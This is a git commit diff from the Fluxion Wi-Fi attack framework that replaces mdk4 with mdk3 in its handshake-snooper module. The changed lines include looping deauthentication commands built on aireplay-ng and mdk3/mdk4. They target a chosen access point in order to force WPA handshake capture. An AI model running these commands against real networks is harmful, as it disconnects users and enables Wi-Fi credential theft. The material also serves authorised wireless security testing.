completely remove mdk4
This commit is contained in:
parent
47cc145d28
commit
d88c01db59
|
@ -168,8 +168,8 @@ handshake_snooper_start_deauthenticator() {
|
||||||
|
|
||||||
# Prepare deauthenticators
|
# Prepare deauthenticators
|
||||||
case "$HandshakeSnooperDeauthenticatorIdentifier" in
|
case "$HandshakeSnooperDeauthenticatorIdentifier" in
|
||||||
"$HandshakeSnooperMdk4MethodOption")
|
"$HandshakeSnooperMdk3MethodOption")
|
||||||
echo "$FluxionTargetMAC" > $FLUXIONWorkspacePath/mdk4_blacklist.lst ;;
|
echo "$FluxionTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst ;;
|
||||||
esac
|
esac
|
||||||
|
|
||||||
# Start deauthenticators.
|
# Start deauthenticators.
|
||||||
|
@ -180,10 +180,10 @@ handshake_snooper_start_deauthenticator() {
|
||||||
"while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $FluxionTargetMAC --ignore-negative-one $HandshakeSnooperJammerInterface; done" &
|
"while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $FluxionTargetMAC --ignore-negative-one $HandshakeSnooperJammerInterface; done" &
|
||||||
HandshakeSnooperDeauthenticatorPID=$!
|
HandshakeSnooperDeauthenticatorPID=$!
|
||||||
;;
|
;;
|
||||||
"$HandshakeSnooperMdk4MethodOption")
|
"$HandshakeSnooperMdk3MethodOption")
|
||||||
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \
|
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \
|
||||||
-title "Deauthenticating all clients on $FluxionTargetSSID" -e \
|
-title "Deauthenticating all clients on $FluxionTargetSSID" -e \
|
||||||
"while true; do sleep 7; timeout 3 mdk4 $HandshakeSnooperJammerInterface d -b $FLUXIONWorkspacePath/mdk4_blacklist.lst -c $FluxionTargetChannel; done" &
|
"while true; do sleep 7; timeout 3 mdk3 $HandshakeSnooperJammerInterface d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $FluxionTargetChannel; done" &
|
||||||
HandshakeSnooperDeauthenticatorPID=$!
|
HandshakeSnooperDeauthenticatorPID=$!
|
||||||
;;
|
;;
|
||||||
esac
|
esac
|
||||||
|
@ -203,7 +203,7 @@ handshake_snooper_set_deauthenticator_identifier() {
|
||||||
local methods=(
|
local methods=(
|
||||||
"$HandshakeSnooperMonitorMethodOption"
|
"$HandshakeSnooperMonitorMethodOption"
|
||||||
"$HandshakeSnooperAireplayMethodOption"
|
"$HandshakeSnooperAireplayMethodOption"
|
||||||
"$HandshakeSnooperMdk4MethodOption"
|
"$HandshakeSnooperMdk3MethodOption"
|
||||||
"$FLUXIONGeneralBackOption"
|
"$FLUXIONGeneralBackOption"
|
||||||
)
|
)
|
||||||
io_query_choice "$HandshakeSnooperMethodQuery" methods[@]
|
io_query_choice "$HandshakeSnooperMethodQuery" methods[@]
|
||||||
|
|
Loading…
Reference in New Issue